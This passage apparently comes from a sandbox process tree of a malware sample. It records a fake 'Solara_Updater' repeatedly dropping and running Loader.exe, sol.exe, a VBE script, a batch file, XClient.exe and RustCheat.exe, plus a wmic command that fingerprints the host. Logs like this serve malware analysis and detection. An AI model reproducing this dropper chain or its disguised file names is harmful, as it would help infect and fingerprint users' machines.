C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"21⤵PID:2628
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "22⤵
- Loads dropped DLL
PID:2568 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"23⤵PID:1732
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"20⤵PID:2928
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"21⤵
- Executes dropped EXE
PID:860
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"21⤵
- Executes dropped EXE
PID:2360 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"22⤵PID:2280
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "23⤵
- Loads dropped DLL
PID:980 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"24⤵PID:2724
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"21⤵PID:2640
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"22⤵
- Executes dropped EXE
PID:2584
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"22⤵
- Executes dropped EXE
PID:2356 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"23⤵PID:2224
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "24⤵
- Loads dropped DLL
PID:2372 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"25⤵PID:840
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"22⤵PID:1248
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"23⤵
- Executes dropped EXE
PID:3028
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"23⤵
- Executes dropped EXE
PID:1948 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"24⤵PID:2268
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "25⤵
- Loads dropped DLL
PID:2024 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"26⤵PID:1692
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"23⤵PID:2980
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"24⤵PID:656
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"24⤵PID:752
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"25⤵PID:1256
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "26⤵
- Loads dropped DLL
PID:2748 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"27⤵PID:1228
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"24⤵PID:3064
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"25⤵PID:1460
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"25⤵PID:1492
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"26⤵PID:2640
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "27⤵
- Loads dropped DLL
PID:2912 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"28⤵PID:3040
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"25⤵PID:524
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"26⤵PID:2576
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"26⤵PID:2256
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"27⤵PID:1536
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "28⤵
- Loads dropped DLL
PID:532 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"29⤵PID:2992
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"26⤵PID:2052
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"27⤵PID:840
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"27⤵PID:2188
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"28⤵PID:752
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "29⤵
- Loads dropped DLL
PID:1476 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"30⤵PID:1820
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"27⤵PID:2604
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"28⤵PID:1784
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"28⤵PID:2912
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"29⤵PID:1660
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "30⤵
- Loads dropped DLL
PID:944 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"31⤵PID:1076
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"28⤵PID:380
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"29⤵PID:1960
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"29⤵PID:836
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"30⤵PID:2652
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "31⤵
- Loads dropped DLL
PID:1760 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"32⤵PID:1928
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"29⤵PID:860
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"30⤵PID:1476
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"30⤵PID:2888
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"31⤵PID:880
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "32⤵
- Loads dropped DLL
PID:2324 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"33⤵PID:1680
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"30⤵PID:1760
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"31⤵PID:1668
-
C:\Users\Admin\AppData\Local\Temp\XClient.exe"C:\Users\Admin\AppData\Local\Temp\XClient.exe"32⤵PID:2548
-
-
C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"32⤵PID:2556
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid33⤵PID:2780
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"31⤵PID:1512
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"32⤵PID:836
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "33⤵
- Loads dropped DLL
PID:1464 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"34⤵PID:1492
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"31⤵PID:1596
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"32⤵PID:316
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"32⤵PID:2024
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"33⤵PID:2056
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "34⤵
- Loads dropped DLL
PID:1604 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"35⤵PID:2516
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"32⤵PID:1476
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"33⤵PID:1576
-
C:\Users\Admin\AppData\Local\Temp\XClient.exe"C:\Users\Admin\AppData\Local\Temp\XClient.exe"34⤵PID:1592
-
-
C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"34⤵PID:2980
-
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"33⤵PID:948
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"34⤵PID:2848
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "35⤵
- Loads dropped DLL
PID:1764 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"36⤵PID:380
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"33⤵PID:2516
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"34⤵PID:1420
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"34⤵PID:3000
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"35⤵PID:2512
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "36⤵
- Loads dropped DLL
PID:2328 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"37⤵PID:1820
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"34⤵PID:2876
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"35⤵PID:1508
-
C:\Users\Admin\AppData\Local\Temp\XClient.exe"C:\Users\Admin\AppData\Local\Temp\XClient.exe"36⤵PID:1524
-
-
C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"36⤵PID:2760
-
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"35⤵PID:2396
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"36⤵PID:940
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "37⤵
- Loads dropped DLL
PID:2224 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"38⤵PID:2244
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"35⤵PID:1496
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"36⤵PID:1232
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"36⤵PID:792
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"37⤵PID:2752
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "38⤵
- Loads dropped DLL
PID:2188 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"39⤵PID:2788
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"36⤵PID:1824
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"37⤵PID:1652
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"37⤵PID:2496
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"38⤵PID:2336
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "39⤵
- Loads dropped DLL
PID:2164 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"40⤵PID:2368
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"37⤵PID:2264
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"38⤵PID:3044
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"38⤵PID:2756
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"39⤵PID:2636
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "40⤵
- Loads dropped DLL
PID:2084 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"41⤵PID:2060
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"38⤵PID:2092
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"39⤵PID:2080
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"39⤵PID:2760
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"40⤵PID:1556
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "41⤵
- Loads dropped DLL
PID:1256 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"42⤵PID:2520
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"39⤵PID:1344
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"40⤵PID:1976
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"40⤵PID:3048
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"41⤵PID:1836
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "42⤵
- Loads dropped DLL
PID:2160 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"43⤵PID:1480
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"40⤵PID:2152
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"41⤵PID:2408
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"41⤵PID:1628
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"42⤵PID:2600
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "43⤵
- Loads dropped DLL
PID:1460 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"44⤵PID:2640
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"41⤵PID:2292
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"42⤵PID:2252
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"42⤵PID:1960
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"43⤵PID:1828
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "44⤵
- Loads dropped DLL
PID:2296 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"45⤵PID:2388
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"42⤵PID:1744
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"43⤵PID:2452
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"43⤵PID:2356
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"44⤵PID:1344
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "45⤵
- Loads dropped DLL
PID:2952 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"46⤵PID:2752
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"43⤵PID:760
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"44⤵PID:2372
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"44⤵PID:1452
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"45⤵PID:2284
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "46⤵
- Loads dropped DLL
PID:924 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"47⤵PID:2796
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"44⤵PID:1796
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"45⤵PID:1840
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"45⤵PID:2024
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"46⤵PID:1960
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "47⤵
- Loads dropped DLL
PID:2776 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"48⤵PID:780
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"45⤵PID:2292
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"46⤵PID:2028
-
C:\Users\Admin\AppData\Local\Temp\XClient.exe"C:\Users\Admin\AppData\Local\Temp\XClient.exe"47⤵PID:2612
-
-
C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"47⤵PID:1688
-
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"46⤵PID:1120
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"47⤵PID:2536
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "48⤵
- Loads dropped DLL
PID:2912 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"49⤵PID:1220
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"46⤵PID:1816
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"47⤵PID:1340
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"47⤵PID:2080
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"48⤵PID:568
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "49⤵
- Loads dropped DLL
PID:1328 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"50⤵PID:1480
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"47⤵PID:1700
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"48⤵PID:1456
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"48⤵PID:2360
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"49⤵PID:2436
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "50⤵
- Loads dropped DLL
PID:2864 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"51⤵PID:2640
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"48⤵PID:2176
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"49⤵PID:1140
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"49⤵PID:1120
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"50⤵PID:2356
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "51⤵
- Loads dropped DLL
PID:1352 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"52⤵PID:2676
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"49⤵PID:1632
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"50⤵PID:1892
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"50⤵PID:1492
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"51⤵PID:2800
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "52⤵
- Loads dropped DLL
PID:2928 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"53⤵PID:2788
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"50⤵PID:2588
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"51⤵PID:2768
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"51⤵PID:1288
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"52⤵PID:1600
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "53⤵
- Loads dropped DLL
PID:2576 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"54⤵PID:896
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"51⤵PID:1604
